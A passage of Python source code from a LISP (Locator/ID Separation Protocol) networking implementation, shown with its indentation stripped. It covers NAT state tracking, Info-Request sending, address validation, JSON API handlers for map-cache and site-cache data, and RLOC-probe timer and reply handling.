# The lisp_nat_state_info{} is a dictionary array with an array a lisp_nat_
# info() values. We keep all the current and previous NAT state associated
# with the Info-Request hostname. This is so we can track how much movement
# is occuring.
#
# Return True if the address and port number changed so the caller can fix up
# RLOCs in map-cache entries.
#
def lisp_store_nat_info(hostname, rloc, port):
addr_str = rloc.print_address_no_iid()
msg = "{} NAT state for {}, RLOC {}, port {}".format("{}",
blue(hostname, False), red(addr_str, False), port)
new_nat_info = lisp_nat_info(addr_str, hostname, port)
if (hostname not in lisp_nat_state_info):
lisp_nat_state_info[hostname] = [new_nat_info]
lprint(msg.format("Store initial"))
return(True)
#endif
#
# The youngest entry is always the first element. So check to see if this
# is a refresh of the youngest (current) entry.
#
nat_info = lisp_nat_state_info[hostname][0]
if (nat_info.address == addr_str and nat_info.port == port):
nat_info.uptime = lisp_get_timestamp()
lprint(msg.format("Refresh existing"))
return(False)
#endif
#
# So the youngest entry is not the newest entry. See if it exists as
# an old entry. If not, we prepend the new state, otherwise, we prepend
# the new state and remove the old state from the array.
#
old_entry = None
for nat_info in lisp_nat_state_info[hostname]:
if (nat_info.address == addr_str and nat_info.port == port):
old_entry = nat_info
break
#endif
#endfor
if (old_entry == None):
lprint(msg.format("Store new"))
else:
lisp_nat_state_info[hostname].remove(old_entry)
lprint(msg.format("Use previous"))
#endif
existing = lisp_nat_state_info[hostname]
lisp_nat_state_info[hostname] = [new_nat_info] + existing
return(True)
#enddef
#
# lisp_get_nat_info
#
# Do lookup to get port number to store in map-cache entry as the encapsulation
# port.
#
def lisp_get_nat_info(rloc, hostname):
if (hostname not in lisp_nat_state_info): return(None)
addr_str = rloc.print_address_no_iid()
for nat_info in lisp_nat_state_info[hostname]:
if (nat_info.address == addr_str): return(nat_info)
#endfor
return(None)
#enddef
#
# lisp_build_info_requests
#
# Check database-mappings to see if there are any private local RLOCs. If
# so, get the translated global RLOC by sending an Info-Request to a
# Map-Server.
#
# To support multi-homing, that is more than one "interface = <device>"
# rloc sub-command clause, you need the following default routes in the
# kernel so Info-Requests can be load-split across interfaces:
#
# sudo ip route add default via <next-hop> dev eth0
# sudo ip route append default via <another-or-same-next-hop> dev eth1
#
# By having these default routes, we can get the next-hop address for the
# NAT interface we are sending the 4341 Info-Request to install a emphemeral
# static route to force the Info-Request to go out a specific interface.
#
def lisp_build_info_requests(lisp_sockets, dest, port):
if (lisp_nat_traversal == False): return
#
# Send Info-Request to each configured Map-Resolver and exit loop.
# If we don't find one, try finding a Map-Server. We may send Info-
# Request to an RTR to open up NAT state.
#
dest_list = []
mr_list = []
if (dest == None):
for mr in list(lisp_map_resolvers_list.values()):
mr_list.append(mr.map_resolver)
#endif
dest_list = mr_list
if (dest_list == []):
for ms in list(lisp_map_servers_list.values()):
dest_list.append(ms.map_server)
#endfor
#endif
if (dest_list == []): return
else:
dest_list.append(dest)
#endif
#
# Find the NAT-traversed interfaces.
#
rloc_list = {}
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
lisp_update_local_rloc(rloc_entry)
if (rloc_entry.rloc.is_null()): continue
if (rloc_entry.interface == None): continue
addr = rloc_entry.rloc.print_address_no_iid()
if (addr in rloc_list): continue
rloc_list[addr] = rloc_entry.interface
#endfor
#endfor
if (rloc_list == {}):
lprint('Suppress Info-Request, no "interface = <device>" RLOC ' + \
"found in any database-mappings")
return
#endif
#
# Send out Info-Requests out the NAT-traversed interfaces that have
# addresses assigned on them.
#
for addr in rloc_list:
interface = rloc_list[addr]
a = red(addr, False)
lprint("Build Info-Request for private address {} ({})".format(a,
interface))
device = interface if len(rloc_list) > 1 else None
for dest in dest_list:
lisp_send_info_request(lisp_sockets, dest, port, device)
#endfor
#endfor
#
# Do DNS lookup for Map-Resolver if "dns-name" configured.
#
if (mr_list != []):
for mr in list(lisp_map_resolvers_list.values()):
mr.resolve_dns_name()
#endfor
#endif
return
#enddef
#
# lisp_valid_address_format
#
# Check to see if the string is a valid address. We are validating IPv4, IPv6
# and MAC addresses.
#
def lisp_valid_address_format(kw, value):
if (kw != "address"): return(True)
#
# Check if address is a Distinguished-Name. Must have single quotes.
# Check this first because names could have ".", ":", or "-" in them.
#
if (value[0] == "'" and value[-1] == "'"): return(True)
#
# Do IPv4 test for dotted decimal x.x.x.x.
#
if (value.find(".") != -1):
addr = value.split(".")
if (len(addr) != 4): return(False)
for byte in addr:
if (byte.isdigit() == False): return(False)
if (int(byte) > 255): return(False)
#endfor
return(True)
#endif
#
# Test for a geo-prefix. They have N, S, W, E characters in them.
#
if (value.find("-") != -1):
addr = value.split("-")
for i in ["N", "S", "W", "E"]:
if (i in addr):
if (len(addr) < 8): return(False)
return(True)
#endif
#endfor
#endif
#
# Do MAC test in format xxxx-xxxx-xxxx.
#
if (value.find("-") != -1):
addr = value.split("-")
if (len(addr) != 3): return(False)
for hexgroup in addr:
try: int(hexgroup, 16)
except: return(False)
#endfor
return(True)
#endif
#
# Do IPv6 test in format aaaa:bbbb::cccc:dddd
#
if (value.find(":") != -1):
addr = value.split(":")
if (len(addr) < 2): return(False)
found_null = False
count = 0
for hexgroup in addr:
count += 1
if (hexgroup == ""):
if (found_null):
if (len(addr) == count): break
if (count > 2): return(False)
#endif
found_null = True
continue
#endif
try: int(hexgroup, 16)
except: return(False)
#endfor
return(True)
#endif
#
# Do E.164 format test. The address is a "+" followed by <= 15 BCD digits.
#
if (value[0] == "+"):
addr = value[1::]
for digit in addr:
if (digit.isdigit() == False): return(False)
#endfor
return(True)
#endif
return(False)
#enddef
#
# lisp_process_api
#
# Used by all lisp processes (not the lisp-core process) to read data
# structures and return them to the LISP process.
#
# Variable data_structure has following format:
#
# "<data-structure-name>%{<dictionary-array-of-parameters>}"
#
# Variable "data_structure" is a string and not a byte string. Caller converts.
#
def lisp_process_api(process, lisp_socket, data_structure):
api_name, parms = data_structure.split("%")
lprint("Process API request '{}', parameters: '{}'".format(api_name,
parms))
data = []
if (api_name == "map-cache"):
if (parms == ""):
data = lisp_map_cache.walk_cache(lisp_process_api_map_cache, data)
else:
data = lisp_process_api_map_cache_entry(json.loads(parms))
#endif
#endif
if (api_name == "site-cache"):
if (parms == ""):
data = lisp_sites_by_eid.walk_cache(lisp_process_api_site_cache,
data)
else:
data = lisp_process_api_site_cache_entry(json.loads(parms))
#endif
#endif
if (api_name == "site-cache-summary"):
data = lisp_process_api_site_cache_summary(lisp_sites_by_eid)
#endif
if (api_name == "map-server"):
parms = {} if (parms == "") else json.loads(parms)
data = lisp_process_api_ms_or_mr(True, parms)
#endif
if (api_name == "map-resolver"):
parms = {} if (parms == "") else json.loads(parms)
data = lisp_process_api_ms_or_mr(False, parms)
#endif
if (api_name == "database-mapping"):
data = lisp_process_api_database_mapping()
#endif
#
# Send IPC back to lisp-core process.
#
data = json.dumps(data)
ipc = lisp_api_ipc(process, data)
lisp_ipc(ipc, lisp_socket, "lisp-core")
return
#enddef
#
# lisp_process_api_map_cache
#
# Return map-cache to API caller.
#
def lisp_process_api_map_cache(mc, data):
#
# There is only destination state in this map-cache entry.
#
if (mc.group.is_null()): return(lisp_gather_map_cache_data(mc, data))
if (mc.source_cache == None): return([True, data])
#
# There is (source, group) state so walk all sources for this group
# entry.
#
data = mc.source_cache.walk_cache(lisp_gather_map_cache_data, data)
return([True, data])
#enddef
#
# lisp_gather_map_cache_data
#
# Return map-cache to API caller.
#
def lisp_gather_map_cache_data(mc, data):
entry = {}
entry["instance-id"] = str(mc.eid.instance_id)
entry["eid-prefix"] = mc.eid.print_prefix_no_iid()
if (mc.group.is_null() == False):
entry["group-prefix"] = mc.group.print_prefix_no_iid()
#endif
entry["uptime"] = lisp_print_elapsed(mc.uptime)
entry["expires"] = lisp_print_elapsed(mc.uptime)
entry["action"] = lisp_map_reply_action_string[mc.action]
entry["ttl"] = "--" if mc.map_cache_ttl == None else \
str(mc.map_cache_ttl / 60)
#
# Encode in RLOC-set which is an array of entries.
#
rloc_set = []
for rloc in mc.rloc_set:
r = lisp_fill_rloc_in_json(rloc)
#
# If this is a multicast RLOC, then add the array for member RLOCs
# that may have responded to a multicast RLOC-probe.
#
if (rloc.rloc.is_multicast_address()):
r["multicast-rloc-set"] = []
for mrloc in list(rloc.multicast_rloc_probe_list.values()):
mr = lisp_fill_rloc_in_json(mrloc)
r["multicast-rloc-set"].append(mr)
#endfor
#endif
rloc_set.append(r)
#endfor
entry["rloc-set"] = rloc_set
data.append(entry)
return([True, data])
#enddef
#
# lisp_fill_rloc_in_json
#
# Fill in fields from lisp_rloc() into the JSON that is reported via the
# restful API.
#
def lisp_fill_rloc_in_json(rloc):
r = {}
addr_str = None
if (rloc.rloc_exists()):
r["address"] = rloc.rloc.print_address_no_iid()
addr_str = r["address"]
#endif
if (rloc.translated_port != 0):
r["encap-port"] = str(rloc.translated_port)
addr_str += ":" + r["encap-port"]
#endif
if (addr_str and addr_str in lisp_crypto_keys_by_rloc_encap):
key = lisp_crypto_keys_by_rloc_encap[addr_str][1]
if (key != None and key.shared_key != None):
r["encap-crypto"] = "crypto-" + key.cipher_suite_string
#endif
#endif
r["state"] = rloc.print_state()
if (rloc.geo): r["geo"] = rloc.geo.print_geo()
if (rloc.elp): r["elp"] = rloc.elp.print_elp(False)
if (rloc.rle): r["rle"] = rloc.rle.print_rle(False, False)
if (rloc.json): r["json"] = rloc.json.print_json(False)
if (rloc.rloc_name): r["rloc-name"] = rloc.rloc_name
stats = rloc.stats.get_stats(False, False)
if (stats): r["stats"] = stats
r["uptime"] = lisp_print_elapsed(rloc.uptime)
r["upriority"] = str(rloc.priority)
r["uweight"] = str(rloc.weight)
r["mpriority"] = str(rloc.mpriority)
r["mweight"] = str(rloc.mweight)
reply = rloc.last_rloc_probe_reply
if (reply):
r["last-rloc-probe-reply"] = lisp_print_elapsed(reply)
r["rloc-probe-rtt"] = str(rloc.rloc_probe_rtt)
#endif
r["rloc-hop-count"] = rloc.rloc_probe_hops
r["recent-rloc-hop-counts"] = rloc.recent_rloc_probe_hops
r["rloc-probe-latency"] = rloc.rloc_probe_latency
r["recent-rloc-probe-latencies"] = rloc.recent_rloc_probe_latencies
recent_rtts = []
for rtt in rloc.recent_rloc_probe_rtts: recent_rtts.append(str(rtt))
r["recent-rloc-probe-rtts"] = recent_rtts
return(r)
#enddef
#
# lisp_process_api_map_cache_entry
#
# Parse API parameters in dictionary array, do longest match lookup.
#
def lisp_process_api_map_cache_entry(parms):
iid = parms["instance-id"]
iid = 0 if (iid == "") else int(iid)
#
# Get EID or source of (S,G).
#
eid = lisp_address(LISP_AFI_NONE, "", 0, iid)
eid.store_prefix(parms["eid-prefix"])
dest = eid
source = eid
#
# See if we are doing a group lookup. Make that destination and the EID
# the source.
#
group = lisp_address(LISP_AFI_NONE, "", 0, iid)
if ("group-prefix" in parms):
group.store_prefix(parms["group-prefix"])
dest = group
#endif
data = []
mc = lisp_map_cache_lookup(source, dest)
if (mc): status, data = lisp_process_api_map_cache(mc, data)
return(data)
#enddef
#
# lisp_process_api_site_cache_summary
#
# Returns:
#
# [ { "site" : '<site-name>", "registrations" : [ {"eid-prefix" : "<eid>",
# "count" : "<count>", "registered-count" : "<registered>" }, ... ]
# } ]
#
def lisp_process_api_site_cache_summary(site_cache):
site = { "site" : "", "registrations" : [] }
entry = { "eid-prefix" : "", "count" : 0, "registered-count" : 0 }
sites = {}
for ml in site_cache.cache_sorted:
for se in list(site_cache.cache[ml].entries.values()):
if (se.accept_more_specifics == False): continue
if (se.site.site_name not in sites):
sites[se.site.site_name] = []
#endif
e = copy.deepcopy(entry)
e["eid-prefix"] = se.eid.print_prefix()
e["count"] = len(se.more_specific_registrations)
for mse in se.more_specific_registrations:
if (mse.registered): e["registered-count"] += 1
#endfor
sites[se.site.site_name].append(e)
#endfor
#endfor
data = []
for site_name in sites:
s = copy.deepcopy(site)
s["site"] = site_name
s["registrations"] = sites[site_name]
data.append(s)
#endfor
return(data)
#enddef
#
# lisp_process_api_site_cache
#
# Return site-cache to API caller.
#
def lisp_process_api_site_cache(se, data):
#
# There is only destination state in this site-cache entry.
#
if (se.group.is_null()): return(lisp_gather_site_cache_data(se, data))
if (se.source_cache == None): return([True, data])
#
# There is (source, group) state so walk all sources for this group
# entry.
#
data = se.source_cache.walk_cache(lisp_gather_site_cache_data, data)
return([True, data])
#enddef
#
# lisp_process_api_ms_or_mr
#
# Return map-cache to API caller.
#
def lisp_process_api_ms_or_mr(ms_or_mr, data):
address = lisp_address(LISP_AFI_NONE, "", 0, 0)
dns_name = data["dns-name"] if ("dns-name" in data) else None
if ("address" in data):
address.store_address(data["address"])
#endif
value = {}
if (ms_or_mr):
for ms in list(lisp_map_servers_list.values()):
if (dns_name):
if (dns_name != ms.dns_name): continue
else:
if (address.is_exact_match(ms.map_server) == False): continue
#endif
value["dns-name"] = ms.dns_name
value["address"] = ms.map_server.print_address_no_iid()
value["ms-name"] = "" if ms.ms_name == None else ms.ms_name
return([value])
#endfor
else:
for mr in list(lisp_map_resolvers_list.values()):
if (dns_name):
if (dns_name != mr.dns_name): continue
else:
if (address.is_exact_match(mr.map_resolver) == False): continue
#endif
value["dns-name"] = mr.dns_name
value["address"] = mr.map_resolver.print_address_no_iid()
value["mr-name"] = "" if mr.mr_name == None else mr.mr_name
return([value])
#endfor
#endif
return([])
#enddef
#
# lisp_process_api_database_mapping
#
# Return array of database-mappings configured, include dynamic data like
# translated_rloc in particular.
#
def lisp_process_api_database_mapping():
data = []
for db in lisp_db_list:
entry = {}
entry["eid-prefix"] = db.eid.print_prefix()
if (db.group.is_null() == False):
entry["group-prefix"] = db.group.print_prefix()
#endif
rlocs = []
for r in db.rloc_set:
rloc = {}
if (r.rloc.is_null() == False):
rloc["rloc"] = r.rloc.print_address_no_iid()
#endif
if (r.rloc_name != None): rloc["rloc-name"] = r.rloc_name
if (r.interface != None): rloc["interface"] = r.interface
tr = r.translated_rloc
if (tr.is_null() == False):
rloc["translated-rloc"] = tr.print_address_no_iid()
#endif
if (rloc != {}): rlocs.append(rloc)
#endfor
#
# Add RLOCs array to EID entry.
#
entry["rlocs"] = rlocs
#
# Add EID entry to return array.
#
data.append(entry)
#endfor
return(data)
#enddef
#
# lisp_gather_site_cache_data
#
# Return site-cache to API caller.
#
def lisp_gather_site_cache_data(se, data):
entry = {}
entry["site-name"] = se.site.site_name
entry["instance-id"] = str(se.eid.instance_id)
entry["eid-prefix"] = se.eid.print_prefix_no_iid()
if (se.group.is_null() == False):
entry["group-prefix"] = se.group.print_prefix_no_iid()
#endif
entry["registered"] = "yes" if se.registered else "no"
entry["first-registered"] = lisp_print_elapsed(se.first_registered)
entry["last-registered"] = lisp_print_elapsed(se.last_registered)
addr = se.last_registerer
addr = "none" if addr.is_null() else addr.print_address()
entry["last-registerer"] = addr
entry["ams"] = "yes" if (se.accept_more_specifics) else "no"
entry["dynamic"] = "yes" if (se.dynamic) else "no"
entry["site-id"] = str(se.site_id)
if (se.xtr_id_present):
entry["xtr-id"] = "0x"+ lisp_hex_string(se.xtr_id)
#endif
#
# Encode in RLOC-set which is an array of entries.
#
rloc_set = []
for rloc in se.registered_rlocs:
r = {}
r["address"] = rloc.rloc.print_address_no_iid() if rloc.rloc_exists() \
else "none"
if (rloc.geo): r["geo"] = rloc.geo.print_geo()
if (rloc.elp): r["elp"] = rloc.elp.print_elp(False)
if (rloc.rle): r["rle"] = rloc.rle.print_rle(False, True)
if (rloc.json): r["json"] = rloc.json.print_json(False)
if (rloc.rloc_name): r["rloc-name"] = rloc.rloc_name
r["uptime"] = lisp_print_elapsed(rloc.uptime)
r["upriority"] = str(rloc.priority)
r["uweight"] = str(rloc.weight)
r["mpriority"] = str(rloc.mpriority)
r["mweight"] = str(rloc.mweight)
rloc_set.append(r)
#endfor
entry["registered-rlocs"] = rloc_set
data.append(entry)
return([True, data])
#enddef
#
# lisp_process_api_site_cache_entry
#
# Parse API parameters in dictionary array, do longest match lookup.
#
def lisp_process_api_site_cache_entry(parms):
iid = parms["instance-id"]
iid = 0 if (iid == "") else int(iid)
#
# Get EID or source of (S,G).
#
eid = lisp_address(LISP_AFI_NONE, "", 0, iid)
eid.store_prefix(parms["eid-prefix"])
#
# See if we are doing a group lookup. Make that destination and the EID
# the source.
#
group = lisp_address(LISP_AFI_NONE, "", 0, iid)
if ("group-prefix" in parms):
group.store_prefix(parms["group-prefix"])
#endif
data = []
se = lisp_site_eid_lookup(eid, group, False)
if (se): lisp_gather_site_cache_data(se, data)
return(data)
#enddef
#
# lisp_get_interface_instance_id
#
# Return instance-ID from lisp_interface() class.
#
def lisp_get_interface_instance_id(device, source_eid):
interface = None
if (device in lisp_myinterfaces):
interface = lisp_myinterfaces[device]
#endif
#
# Didn't find an instance-ID configured on a "lisp interface", return
# the default.
#
if (interface == None or interface.instance_id == None):
return(lisp_default_iid)
#endif
#
# If there is a single interface data structure for a given device,
# return the instance-ID conifgured for it. Otherwise, check to see
# if this is a multi-tenant EID-prefix. And then test all configured
# prefixes in each lisp_interface() for a best match. This allows
# for multi-tenancy on a single xTR interface.
#
iid = interface.get_instance_id()
if (source_eid == None): return(iid)
save_iid = source_eid.instance_id
best = None
for interface in lisp_multi_tenant_interfaces:
if (interface.device != device): continue
prefix = interface.multi_tenant_eid
source_eid.instance_id = prefix.instance_id
if (source_eid.is_more_specific(prefix) == False): continue
if (best == None or best.multi_tenant_eid.mask_len < prefix.mask_len):
best = interface
#endif
#endfor
source_eid.instance_id = save_iid
if (best == None): return(iid)
return(best.get_instance_id())
#enddef
#
# lisp_allow_dynamic_eid
#
# Returns dynamic-eid-deivce (or device if "dynamic-eid-device" not configured)
# if supplied EID matches configured dynamic-EID in a "lisp interface" command.
# Otherwise, returns None.
#
def lisp_allow_dynamic_eid(device, eid):
if (device not in lisp_myinterfaces): return(None)
interface = lisp_myinterfaces[device]
return_interface = device if interface.dynamic_eid_device == None else \
interface.dynamic_eid_device
if (interface.does_dynamic_eid_match(eid)): return(return_interface)
return(None)
#enddef
#
# lisp_start_rloc_probe_timer
#
# Set the RLOC-probe timer to expire in 1 minute (by default).
#
def lisp_start_rloc_probe_timer(interval, lisp_sockets):
global lisp_rloc_probe_timer
if (lisp_rloc_probe_timer != None): lisp_rloc_probe_timer.cancel()
func = lisp_process_rloc_probe_timer
timer = threading.Timer(interval, func, [lisp_sockets])
lisp_rloc_probe_timer = timer
timer.start()
return
#enddef
#
# lisp_show_rloc_probe_list
#
# Print out the lisp_show_rloc_probe_list in a readable way for debugging.
#
def lisp_show_rloc_probe_list():
lprint(bold("----- RLOC-probe-list -----", False))
for key in lisp_rloc_probe_list:
rloc_array = lisp_rloc_probe_list[key]
lprint("RLOC {}:".format(key))
for r, e, g in rloc_array:
lprint(" [{}, {}, {}, {}]".format(hex(id(r)), e.print_prefix(),
g.print_prefix(), r.translated_port))
#endfor
#endfor
lprint(bold("---------------------------", False))
return
#enddef
#
# lisp_mark_rlocs_for_other_eids
#
# When the parent RLOC that we have RLOC-probe state for comes reachable or
# goes unreachable, set the state appropriately for other EIDs using the SAME
# RLOC. The parent is the first RLOC in the eid-list.
#
def lisp_mark_rlocs_for_other_eids(eid_list):
#
# Don't process parent but put its EID in printed list.
#
rloc, e, g = eid_list[0]
eids = [lisp_print_eid_tuple(e, g)]
for rloc, e, g in eid_list[1::]:
rloc.state = LISP_RLOC_UNREACH_STATE
rloc.last_state_change = lisp_get_timestamp()
eids.append(lisp_print_eid_tuple(e, g))
#endfor
unreach = bold("unreachable", False)
rloc_str = red(rloc.rloc.print_address_no_iid(), False)
for eid in eids:
e = green(eid, False)
lprint("RLOC {} went {} for EID {}".format(rloc_str, unreach, e))
#endfor
#
# For each EID, tell external data-plane about new RLOC-set (RLOCs minus
# the ones that just went unreachable).
#
for rloc, e, g in eid_list:
mc = lisp_map_cache.lookup_cache(e, True)
if (mc): lisp_write_ipc_map_cache(True, mc)
#endfor
return
#enddef
#
# lisp_process_rloc_probe_timer
#
# Periodic RLOC-probe timer has expired. Go through cached RLOCs from map-
# cache and decide to suppress or rate-limit RLOC-probes. This function
# is also used to time out "unreachability" state so we can start RLOC-probe
# a previously determined unreachable RLOC.
#
def lisp_process_rloc_probe_timer(lisp_sockets):
lisp_set_exception()
lisp_start_rloc_probe_timer(LISP_RLOC_PROBE_INTERVAL, lisp_sockets)
if (lisp_rloc_probing == False): return
#
# Debug code. Must rebuild image to set boolean to True.
#
if (lisp_print_rloc_probe_list): lisp_show_rloc_probe_list()
#
# Check for egress multi-homing.
#
default_next_hops = lisp_get_default_route_next_hops()
lprint("---------- Start RLOC Probing for {} entries ----------".format( \
len(lisp_rloc_probe_list)))
#
# Walk the list.
#
count = 0
probe = bold("RLOC-probe", False)
for values in list(lisp_rloc_probe_list.values()):
#
# Just do one RLOC-probe for the RLOC even if it is used for
# multiple EID-prefixes.
#
last_rloc = None
for parent_rloc, eid, group in values:
addr_str = parent_rloc.rloc.print_address_no_iid()
#
# Do not RLOC-probe gleaned entries if configured.
#
glean, do_probe, y = lisp_allow_gleaning(eid, None, parent_rloc)
if (glean and do_probe == False):
e = green(eid.print_address(), False)
addr_str += ":{}".format(parent_rloc.translated_port)
lprint("Suppress probe to RLOC {} for gleaned EID {}".format( \
red(addr_str, False), e))
continue
#endif
#
# Do not send RLOC-probes to RLOCs that are in down-state or admin-
# down-state. The RLOC-probe reply will apply for all EID-prefixes
# and the RLOC state will be updated for each.
#
if (parent_rloc.down_state()): continue
#
# Do not send multiple RLOC-probes to the same RLOC for
# different EID-prefixes. Multiple RLOC entries could have
# same RLOC address but differnet translated ports. These
# need to be treated as different ETRs (they are both behind
# the same NAT) from an RTR's perspective. On an ITR, if the
# RLOC-names are different for the same RLOC address, we need
# to treat these as different ETRs since an ITR does not keep
# port state for an RLOC.
#
if (last_rloc):
parent_rloc.last_rloc_probe_nonce = \
last_rloc.last_rloc_probe_nonce
if (last_rloc.translated_port == parent_rloc.translated_port \
and last_rloc.rloc_name == parent_rloc.rloc_name):
e = green(lisp_print_eid_tuple(eid, group), False)
lprint("Suppress probe to duplicate RLOC {} for {}". \
format(red(addr_str, False), e))
#
# Copy last-rloc send probe timer, so all EIDs using the
# same RLOC can have sync'ed rtts.
#
parent_rloc.last_rloc_probe = last_rloc.last_rloc_probe
continue
#endif
#endif
nh = None
rloc = None
while (True):
rloc = parent_rloc if rloc == None else rloc.next_rloc
if (rloc == None): break
#
# First check if next-hop/interface is up for egress multi-
# homing.
#
if (rloc.rloc_next_hop != None):
if (rloc.rloc_next_hop not in default_next_hops):
if (rloc.up_state()):
d, n = rloc.rloc_next_hop
rloc.state = LISP_RLOC_UNREACH_STATE
rloc.last_state_change = lisp_get_timestamp()
lisp_update_rtr_updown(rloc.rloc, False)
#endif
unreach = bold("unreachable", False)
lprint("Next-hop {}({}) for RLOC {} is {}".format(n, d,
red(addr_str, False), unreach))
continue
#endif
#endif
#
# Send RLOC-probe to unreach-state RLOCs if down for a minute.
#
last = rloc.last_rloc_probe
delta = 0 if last == None else time.time() - last
if (rloc.unreach_state() and delta < LISP_RLOC_PROBE_INTERVAL):
lprint("Waiting for probe-reply from RLOC {}".format( \
red(addr_str, False)))
continue
#endif
#
# Check to see if we are in nonce-echo mode and no echo has
# been returned.
#
echo_nonce = lisp_get_echo_nonce(None, addr_str)
if (echo_nonce and echo_nonce.request_nonce_timeout()):
rloc.state = LISP_RLOC_NO_ECHOED_NONCE_STATE
rloc.last_state_change = lisp_get_timestamp()
unreach = bold("unreachable", False)
lprint("RLOC {} went {}, nonce-echo failed".format( \
red(addr_str, False), unreach))
lisp_update_rtr_updown(rloc.rloc, False)
continue
#endif
#
# Suppress sending RLOC probe if we just a nonce-echo in the
# last minute.
#
if (echo_nonce and echo_nonce.recently_echoed()):
lprint(("Suppress RLOC-probe to {}, nonce-echo " + \
"received").format(red(addr_str, False)))
continue
#endif
#
# Check if we have not received a RLOC-probe reply for one
# timer interval. If not, put RLOC state in "unreach-state".
#
if (rloc.last_rloc_probe != None):
last = rloc.last_rloc_probe_reply
if (last == None): last = 0
delta = time.time() - last
if (rloc.up_state() and \
delta >= LISP_RLOC_PROBE_REPLY_WAIT):
rloc.state = LISP_RLOC_UNREACH_STATE
rloc.last_state_change = lisp_get_timestamp()
lisp_update_rtr_updown(rloc.rloc, False)
unreach = bold("unreachable", False)
lprint("RLOC {} went {}, probe it".format( \
red(addr_str, False), unreach))
lisp_mark_rlocs_for_other_eids(values)
#endif
#endif
rloc.last_rloc_probe = lisp_get_timestamp()
reach = "" if rloc.unreach_state() == False else " unreachable"
#
# Send Map-Request RLOC-probe. We may have to send one for each
# egress interface to the same RLOC address. Install host
# route in RLOC so we can direct the RLOC-probe on an egress
# interface.
#
nh_str = ""
n = None
if (rloc.rloc_next_hop != None):
d, n = rloc.rloc_next_hop
lisp_install_host_route(addr_str, n, True)
nh_str = ", send on nh {}({})".format(n, d)
#endif
#
# Print integrated log message before sending RLOC-probe.
#
rtt = rloc.print_rloc_probe_rtt()
astr = addr_str
if (rloc.translated_port != 0):
astr += ":{}".format(rloc.translated_port)
#endif
astr= red(astr, False)
if (rloc.rloc_name != None):
astr += " (" + blue(rloc.rloc_name, False) + ")"
#endif
lprint("Send {}{} {}, last rtt: {}{}".format(probe, reach,
astr, rtt, nh_str))
#
# If we are doing multiple egress interfaces, check for host
# routes. We don't want the ones we selected for forwarding to
# affect the path RLOC-probes go out in the following loop. We
# will restore the host route while waiting for RLOC-replies.
# Then we'll select a new host route based on best RTT.
#
if (rloc.rloc_next_hop != None):
nh = lisp_get_host_route_next_hop(addr_str)
if (nh): lisp_install_host_route(addr_str, nh, False)
#endif
#
# Might be first time and other RLOCs on the chain may not
# have RLOC address. Copy now.
#
if (rloc.rloc.is_null()):
rloc.rloc.copy_address(parent_rloc.rloc)
#endif
#
# Send RLOC-probe Map-Request.
#
seid = None if (group.is_null()) else eid
deid = eid if (group.is_null()) else group
lisp_send_map_request(lisp_sockets, 0, seid, deid, rloc)
last_rloc = parent_rloc
#
# Remove installed host route.
#
if (n): lisp_install_host_route(addr_str, n, False)
#endwhile
#
# Reisntall host route for forwarding.
#
if (nh): lisp_install_host_route(addr_str, nh, True)
#
# Send 10 RLOC-probes and then sleep for 20 ms.
#
count += 1
if ((count % 10) == 0): time.sleep(0.020)
#endfor
#endfor
lprint("---------- End RLOC Probing ----------")
return
#enddef
#
# lisp_update_rtr_updown
#
# The lisp-itr process will send an IPC message to the lisp-etr process for
# the RLOC-probe status change for an RTR.
#
def lisp_update_rtr_updown(rtr, updown):
global lisp_ipc_socket
#
# This is only done on an ITR.
#
if (lisp_i_am_itr == False): return
#
# When the xtr-parameter indicates to register all RTRs, we are doing it
# conditionally so we don't care about the status. Suppress IPC messages.
#
if (lisp_register_all_rtrs): return
rtr_str = rtr.print_address_no_iid()
#
# Check if RTR address is in LISP the lisp-itr process learned from the
# map-server.
#
if (rtr_str not in lisp_rtr_list): return
updown = "up" if updown else "down"
lprint("Send ETR IPC message, RTR {} has done {}".format(
red(rtr_str, False), bold(updown, False)))
#
# Build IPC message.
#
ipc = "rtr%{}%{}".format(rtr_str, updown)
ipc = lisp_command_ipc(ipc, "lisp-itr")
lisp_ipc(ipc, lisp_ipc_socket, "lisp-etr")
return
#enddef
#
# lisp_process_rloc_probe_reply
#
# We have received a RLOC-probe Map-Reply, process it.
#
def lisp_process_rloc_probe_reply(rloc_entry, source, port, map_reply, ttl,
mrloc):
rloc = rloc_entry.rloc
nonce = map_reply.nonce
hc = map_reply.hop_count
probe = bold("RLOC-probe reply", False)
map_reply_addr = rloc.print_address_no_iid()
source_addr = source.print_address_no_iid()
pl = lisp_rloc_probe_list
jt = rloc_entry.json.json_string if rloc_entry.json else None
ts = lisp_get_timestamp()
#
# If this RLOC-probe reply is in response to a RLOC-probe request to a
# multicast RLOC, then store all responses. Create a lisp_rloc() for new
# entries.
#
if (mrloc != None):
multicast_rloc = mrloc.rloc.print_address_no_iid()
if (map_reply_addr not in mrloc.multicast_rloc_probe_list):
nrloc = lisp_rloc()
nrloc = copy.deepcopy(mrloc)
nrloc.rloc.copy_address(rloc)
nrloc.multicast_rloc_probe_list = {}
mrloc.multicast_rloc_probe_list[map_reply_addr] = nrloc
#endif
nrloc = mrloc.multicast_rloc_probe_list[map_reply_addr]
nrloc.last_rloc_probe_nonce = mrloc.last_rloc_probe_nonce
nrloc.last_rloc_probe = mrloc.last_rloc_probe
r, eid, group = lisp_rloc_probe_list[multicast_rloc][0]
nrloc.process_rloc_probe_reply(ts, nonce, eid, group, hc, ttl, jt)
mrloc.process_rloc_probe_reply(ts, nonce, eid, group, hc, ttl, jt)
return
#endif
#
# If we can't find RLOC address from the Map-Reply in the probe-list,
# maybe the same ETR is sending sourcing from a different address. Check
# that address in the probe-list.
#
addr = map_reply_addr
if (addr not in pl):
addr += ":" + str(port)
if (addr not in pl):
addr = source_addr
if (addr not in pl):
addr += ":" + str(port)
lprint(" Received unsolicited {} from {}/{}, port {}". \
format(probe, red(map_reply_addr, False), red(source_addr,
False), port))
return
#endif
#endif
#endif
#
# Look for RLOC in the RLOC-probe list for EID tuple and fix-up stored
# RLOC-probe state.
#
for rloc, eid, group in lisp_rloc_probe_list[addr]:
if (lisp_i_am_rtr):
if (rloc.translated_port != 0 and rloc.translated_port != port):
continue
#endif
#endif
rloc.process_rloc_probe_reply(ts, nonce, eid, group, hc, ttl, jt)
#endfor
return
#enddef
#
# lisp_db_list_length
#
# Returns the number of entries that need to be registered. This will include
# static and dynamic EIDs.
#
def lisp_db_list_length():
count = 0
for db in lisp_db_list:
count += len(db.dynamic_eids) if db.dynamic_eid_configured() else 1
count += len(db.eid.iid_list)
#endif
return(count)
#endif
#
# lisp_is_myeid
#
# Return true if supplied EID is an EID supported by this ETR. That means a
# longest match lookup is done.
#
